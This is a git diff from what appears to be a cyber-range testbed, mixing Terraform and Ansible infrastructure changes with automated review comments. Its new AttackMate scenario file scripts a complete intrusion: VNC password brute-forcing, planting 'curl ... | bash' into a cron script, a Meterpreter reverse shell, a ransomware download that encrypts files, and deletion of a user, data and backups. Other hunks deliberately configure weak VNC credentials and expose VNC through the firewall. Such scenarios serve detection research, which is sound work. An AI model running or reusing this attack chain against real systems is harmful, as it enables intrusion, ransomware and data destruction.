diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 88e74a6..7c9faeb 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -37,6 +37,7 @@ mode: '0755' loop: - scenario_3_a_a + - scenario_3_a_b - upgrade - scenario_3_b - scenario_3_c @@ -61,18 +62,30 @@ - attackmate - exploit - - name: "Run Scenario 3 b" + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_b.yml" chdir: "{{user_home.stdout}}" tags: - - scenario_3_b + - scenario_3_a_b - metasploit - attackmate - exploit - + + - name: "Run Scenario 3 b" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_b + - metasploit + - attackmate + - exploit + - name: "Run Scenario 3 c" become: True become_user: "{{attacker_user}}" @@ -84,7 +97,7 @@ - metasploit - attackmate - exploit - + - name: "Run Scenario 3 d" become: True become_user: "{{attacker_user}}" @@ -96,3 +109,4 @@ - metasploit - attackmate - exploit + diff --git a/ansible/run/scenario3/templates/scenario_3_a_a.j2 b/ansible/run/scenario3/templates/scenario_3_a_a.j2 index 0740e54..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_a.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_a.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 a a # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 new file mode 100644 index 0000000..4bad312 --- /dev/null +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 
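Review bot: The added "Run Scenario 3 a b" task in the `@@ -61,18 +62,30 @@` hunk of `ansible/run/scenario3/main.yml` uses `ansible.builtin.shell` for a fixed command line with no pipes, redirects or globbing, so `ansible.builtin.command:` with the same `cmd`/`chdir` keys would run it without passing the string through a shell. The task also reads `user_home.stdout`, which is registered outside this hunk; if the registering task does not carry the `scenario_3_a_b` tag (or `always`), a run limited to the new tag would presumably fail on an undefined variable, so that is worth confirming. Writing `become: true` in lowercase keeps the boolean unambiguous across YAML 1.1 and 1.2 parsers.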
@@ -0,0 +1,173 @@ +#################### +# +# Scenario 3 a b +# +#################### + +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + $DNS_SERVER: 192.42.0.233 + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + +commands: + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + + - type: vnc + session: foothold + cmd: click + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "terminal" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 1 + + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + - type: vnc + cmd: close + session: foothold + +#################### MOVED ############################################ + - type: msf-session + 
session: movement + cmd: sysinfo + + - type: msf-session + session: movement + cmd: getuid + + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + + - type: msf-session + session: movement + cmd: find /media/data/Images + + - type: msf-session + session: movement + cmd: cat /etc/passwd + + - type: msf-session + session: movement + cmd: userdel -f john + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service + diff --git a/ansible/run/scenario3/templates/scenario_3_b.j2 b/ansible/run/scenario3/templates/scenario_3_b.j2 index 60e3ce8..2a6fc47 100644 --- a/ansible/run/scenario3/templates/scenario_3_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 b # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_c.j2 b/ansible/run/scenario3/templates/scenario_3_c.j2 index 2ce93b7..7310b49 100644 --- a/ansible/run/scenario3/templates/scenario_3_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_c.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 c # #################### vars: diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index 1c92bc7..83bef6b 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml 
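Review bot: The new template `scenario_3_a_b.j2` hard-codes `$SERVER_ADDRESS`, `$ATTACKER_ADDRESS` and `$DNS_SERVER` as literals although it is rendered by Jinja, while its later steps are destructive (`rm -rf /media/data/*`, `rm -rf /var/backups/*`, `userdel -f john`). If the testbed networks are renumbered or the playbook is rendered for another deployment, those steps run against whatever host then holds that address; rendering the values from inventory, e.g. `$SERVER_ADDRESS: "{{ scenario3_server_address }}"` (variable name is a placeholder), keeps the target tied to the deployed testbed. `$DNS_SERVER` is defined but not referenced in this file, and the `MOVED` banner would be clearer as a comment naming the scenario the block was taken from. A short header comment listing the steps that change or delete data would also help whoever labels the resulting logs.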
@@ -83,6 +83,7 @@ - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER:22", proto: tcp, dest_port: 10022 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 3389 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 4501 } + - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 5901 } - Reposerver to Linux-Share - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 1881 } - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 111,2049 } diff --git a/packer/repository/playbook/main.yaml b/packer/repository/playbook/main.yaml index d51577a..e992f7c 100644 --- a/packer/repository/playbook/main.yaml +++ b/packer/repository/playbook/main.yaml @@ -26,6 +26,11 @@ hostname_fqdn: "puppet.aecid-testbed.local" hostname_ip: "172.17.100.122" - role: aeciduser + - role: weaklinuxuser + vars: + weaklinuxuser_sudo: False + weaklinuxuser_groups: + - sudo vars: # pass: aecid aeciduser_pass: "$6$9AqxTPJqYsFXwgPN$xAC4y1Vndk00EaBCuFcJC37BYDYYVAgt9SHymg15KSdKddZnwG.SsQaJvHarH4DYQj3tuboeLa4G5EfL7itcC0" @@ -35,11 +40,12 @@ - role: manage_unattended_upgrades - role: auditd - role: mate-desktop - - role: weaklinuxuser + - role: tightvnc vars: - weaklinuxuser_sudo: False - weaklinuxuser_groups: - - sudo + vnc_user: "john" + vnc_password: "12345678" + vnc_display: ":1" + vnc_port: 5901 - role: puppetserver - role: disableresolved - role: acct diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 3a3269b..eea2d34 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -44,4 +44,6 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-puppetserver.git version: v1.0.0 name: puppetserver - + - src: https://github.com/ait-testbed/atb-ansible-tightvnc.git + version: v1.0.0 + name: tightvnc 
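Review bot: The added DNAT rule for `dest_port: 5901` in `packer/firewall/playbook/main.yaml` forwards VNC on the reposerver to the whole `inet` zone, and nothing near the line says that this exposure is deliberate. Together with the weak `vnc_password` set in `packer/repository/playbook/main.yaml` in this commit it looks intended as the scenario's entry point, so a comment above the rule such as `# VNC (display :1) exposed on purpose for scenario 3 a b; do not reuse outside the testbed` would keep it from being copied into a real ruleset or removed as a mistake. The rule list continues outside the hunk.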
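Review bot: In the `@@ -26,6 +26,11 @@` hunk of `packer/repository/playbook/main.yaml` the five added `weaklinuxuser` lines are inserted between `- role: aeciduser` and the `vars:` block that holds `aeciduser_pass`, so by line order that `vars:` now follows the `weaklinuxuser` entry instead. Indentation cannot be recovered from this page, but if the context lines are unchanged the `weaklinuxuser` item ends up with two `vars:` keys; Ansible by default warns and keeps only the last one, which would drop `weaklinuxuser_sudo` and `weaklinuxuser_groups` and leave `aeciduser` without its password variable. Moving the added block below the `aeciduser_pass: ...` line, i.e. after the complete `aeciduser` entry, avoids that.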
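Review bot: The `tightvnc` role vars added in the `@@ -35,11 +40,12 @@` hunk carry the literals `vnc_user: "john"` and `vnc_password: "12345678"`, which have to stay in step with `username: john` and the last entry of `$LISTA` in `ansible/run/scenario3/templates/scenario_3_a_b.j2`, yet neither file mentions the other. A comment above the role, for example `# deliberately weak VNC credentials for scenario 3 a b; keep in sync with $LISTA in scenario_3_a_b.j2`, would document both the intent and the coupling. `vnc_port: 5901` likewise has to match the DNAT rule added in the firewall playbook.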
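Review bot: The new `tightvnc` entry in `packer/repository/playbook/requirements.yml` pins the role to the git tag `v1.0.0`, and a tag can be re-pointed upstream after this commit, so the image build could pull different role code without any change in this repository. Pinning to the full commit hash, `version: <full-commit-sha-of-v1.0.0>` (placeholder), with the tag kept in a trailing comment, makes the build reproducible. The `puppetserver` entry visible in the context lines is pinned the same way; the rest of the list is outside the hunk.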
diff --git a/terragrunt/attacker/module/fetch_network_uuid.sh b/terragrunt/attacker/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/attacker/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 259b33f..caf308b 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],514) } 
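Review bot: `fetch_network_uuid.sh` reports success even when the lookup finds nothing: with `set -e` alone a failing `jq` inside `eval "$(...)"` goes unnoticed, and an empty or multi-line `openstack network list` result is passed on as the `uuid` value, so Terraform fails later with a less obvious error. Using `set -euo pipefail` and adding a check after the lookup, e.g. `[[ "$UUID" =~ ^[0-9a-f-]{36}$ ]] || { echo "network '$NETWORK_NAME': expected exactly one UUID" >&2; exit 1; }`, makes the failure explicit, and `-u` also catches an unset `OS_PROJECT_ID`. The header comment "NETWORK_NAME and shell variables" looks like a leftover from the text it was adapted from and could simply read "into the shell variable NETWORK_NAME". The same file is added verbatim as `terragrunt/fetch_network_uuid.sh` and `terragrunt/videoserver/module/fetch_network_uuid.sh`; keeping a single copy would prevent the three from drifting apart.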
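Review bot: The new `uuid = "${openstack_networking_network_v2.internet.id}"` in the `inet-dns` network block wraps a single reference in a string template; the file already uses bare expressions (`cidrhost(...)`), so the plain form `uuid = openstack_networking_network_v2.internet.id` matches the rest of the file and avoids Terraform's interpolation-only warning. The same applies to every `uuid =` line added in the `inet-fw` and `mgmt` hunks of this file and to the `data.external.*.result.uuid` references added in the videoserver module. The resource body continues outside the hunk.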
@@ -220,27 +220,27 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["lan"],254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["dmz"],254) } network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["admin"],254) } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["user"],254) } @@ -298,30 +298,32 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_ips.internet } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_ips.lan } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_ips.dmz } + network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = local.mgmt_ips.admin } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = local.mgmt_ips.user } + depends_on = [ openstack_networking_network_v2.dmz, openstack_networking_network_v2.internet, diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 3e52381..7af7c4f 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl 
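Review bot: In the `mgmt` hunk (`@@ -298,30 +298,32 @@`) the `depends_on` list after the network blocks still names `openstack_networking_network_v2.dmz` and `openstack_networking_network_v2.internet`, although the new `uuid =` references already give Terraform those dependencies implicitly. The list could be trimmed to the resources that are not referenced directly (subnets, if any are listed), with a comment such as `# networks are implied by the uuid references above; only non-referenced resources are listed here`. The list continues outside the hunk, so which entries remain necessary needs to be checked against the full file.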
@@ -11,10 +11,10 @@ inputs = { host_userdata = "firewallinit.yml" ext_router = "taq-router" sshkey = "testbed-key" - inetdns_image = "ubuntu-2204" + inetdns_image = "Ubuntu 22.04" inetfw_image = "atb-fw-inet-lan-dmz-image-2023-08-24T13-50-01Z" - mgmt_image = "ubuntu-2204" - floating_pool = "provider-aecid-208" + mgmt_image = "Ubuntu 22.04" + floating_pool = "AECID-provider-network" } diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh new file mode 100755 index 0000000..7357333 --- /dev/null +++ b/terragrunt/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/terragrunt.hcl b/terragrunt/terragrunt.hcl index 0c570c5..7b1351b 100644 --- a/terragrunt/terragrunt.hcl +++ b/terragrunt/terragrunt.hcl 
@@ -1,9 +1,9 @@ remote_state { backend = "http" config = { - address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" - lock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" - unlock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" + lock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + unlock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" username = "${get_env("GITLAB_USERNAME")}" password = "${get_env("CR_GITLAB_ACCESS_TOKEN")}" lock_method = "POST" diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index 9fcb02c..b7be984 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "ADMINPC" # + +data "external" "admin_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "admin" + } +} + data "template_file" "userdata_adminpc" { template = "${file("${local.ext_adminpc_userdata_file}")}" } 
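Review bot: The project id `3012` is repeated in `address`, `lock_address` and `unlock_address`, which is why this commit had to touch three long lines to change one value. Building the URL once in a `locals` block (hypothetical name `state_url`, holding the existing `https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/...` expression) and writing `address = local.state_url` and `lock_address = "${local.state_url}/lock"` (same for `unlock_address`) keeps the three from diverging. The `remote_state` block continues outside the hunk.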
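Review bot: The added `data "external" "admin_uuid"` block in `adminpc.tf` runs `./fetch_network_uuid.sh` relative to the process working directory and makes every plan depend on `bash`, `jq`, the `openstack` CLI and `OS_PROJECT_ID` being present on the runner, with the script passing its input through `eval`. At minimum the path should be anchored: `program = ["bash", "${path.module}/fetch_network_uuid.sh"]`. If the provider's own data source fits, `data "openstack_networking_network_v2" "admin" { name = "admin" }` with `uuid = data.openstack_networking_network_v2.admin.id` would remove the external program altogether; whether a project filter is also needed (the script passes `--project`) should be confirmed. The same block is added for `internet` in `dnsserver.tf` and for `dmz` in `videoserver.tf`.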
@@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "admin" + uuid = "${data.external.admin_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.admin_cidr,222) } diff --git a/terragrunt/videoserver/module/adminpc_variables.tf b/terragrunt/videoserver/module/adminpc_variables.tf index 0f74207..533b4ee 100644 --- a/terragrunt/videoserver/module/adminpc_variables.tf +++ b/terragrunt/videoserver/module/adminpc_variables.tf @@ -6,7 +6,7 @@ variable "adminpc_image" { variable "adminpc_flavor" { type = string description = "flavor of the adminpc host" - default = "m1.small" + default = "d2-2" } variable "adminpc_userdata" { diff --git a/terragrunt/videoserver/module/dnsserver.tf b/terragrunt/videoserver/module/dnsserver.tf index 5a184a1..a169967 100644 --- a/terragrunt/videoserver/module/dnsserver.tf +++ b/terragrunt/videoserver/module/dnsserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "DNS-Server" # + +data "external" "internet_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "internet" + } +} + data "template_file" "userdata_dnsserver" { template = "${file("${local.ext_dnsserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "dnsserver" { user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered network { - name = "internet" + uuid = "${data.external.internet_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.inet_cidr,233) } diff --git a/terragrunt/videoserver/module/dnsserver_variables.tf b/terragrunt/videoserver/module/dnsserver_variables.tf index 629299a..39d727f 100644 --- a/terragrunt/videoserver/module/dnsserver_variables.tf +++ b/terragrunt/videoserver/module/dnsserver_variables.tf 
@@ -6,7 +6,7 @@ variable "dnsserver_image" { variable "dnsserver_flavor" { type = string description = "flavor of the dnsserver host" - default = "m1.small" + default = "d2-2" } variable "dnsserver_userdata" { diff --git a/terragrunt/videoserver/module/fetch_network_uuid.sh b/terragrunt/videoserver/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/videoserver/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/videoserver.tf b/terragrunt/videoserver/module/videoserver.tf index 15c1321..734513a 100644 --- a/terragrunt/videoserver/module/videoserver.tf +++ b/terragrunt/videoserver/module/videoserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "VIDEOSERVER" # + +data "external" "dmz_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "dmz" + } +} + data "template_file" "userdata_videoserver" { template = "${file("${local.ext_videoserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "videoserver" { user_data = local.ext_videoserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitvideoserver[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,121) } 
diff --git a/terragrunt/videoserver/module/videoserver_variables.tf b/terragrunt/videoserver/module/videoserver_variables.tf index 4b4f250..61ee45a 100644 --- a/terragrunt/videoserver/module/videoserver_variables.tf +++ b/terragrunt/videoserver/module/videoserver_variables.tf @@ -6,7 +6,7 @@ variable "videoserver_image" { variable "videoserver_flavor" { type = string description = "flavor of the videoserver host" - default = "m1.small" + default = "d2-2" } variable "videoserver_userdata" { diff --git a/terragrunt/videoserver/module/webcam.tf b/terragrunt/videoserver/module/webcam.tf index 426857c..50a0b85 100644 --- a/terragrunt/videoserver/module/webcam.tf +++ b/terragrunt/videoserver/module/webcam.tf @@ -6,6 +6,7 @@ locals { # # CREATE INSTANCE for "Webcam-Server" # + data "template_file" "userdata_webcam" { template = "${file("${local.ext_webcam_userdata_file}")}" } @@ -35,7 +36,7 @@ resource "openstack_compute_instance_v2" "webcam" { user_data = local.ext_webcam_userdata_file == null ? null : data.template_cloudinit_config.cloudinitwebcam[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,80) } diff --git a/terragrunt/videoserver/module/webcam_variables.tf b/terragrunt/videoserver/module/webcam_variables.tf index b2b8d83..5536b81 100644 --- a/terragrunt/videoserver/module/webcam_variables.tf +++ b/terragrunt/videoserver/module/webcam_variables.tf @@ -6,7 +6,7 @@ variable "webcam_image" { variable "webcam_flavor" { type = string description = "flavor of the webcam host" - default = "m1.small" + default = "d2-2" } variable "webcam_userdata" {
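Review bot: In the `@@ -35,7 +36,7 @@` hunk of `webcam.tf` the new `uuid = "${data.external.dmz_uuid.result.uuid}"` uses a data source that this commit declares in `videoserver.tf`, not in this file, so removing or renaming the videoserver definition breaks the webcam instance with no hint here. A comment above the `network` block such as `# dmz_uuid is declared in videoserver.tf` would be enough, or the shared lookups could move into one file of their own (hypothetical name `networks.tf`). The `webcam` resource starts and ends outside the hunk.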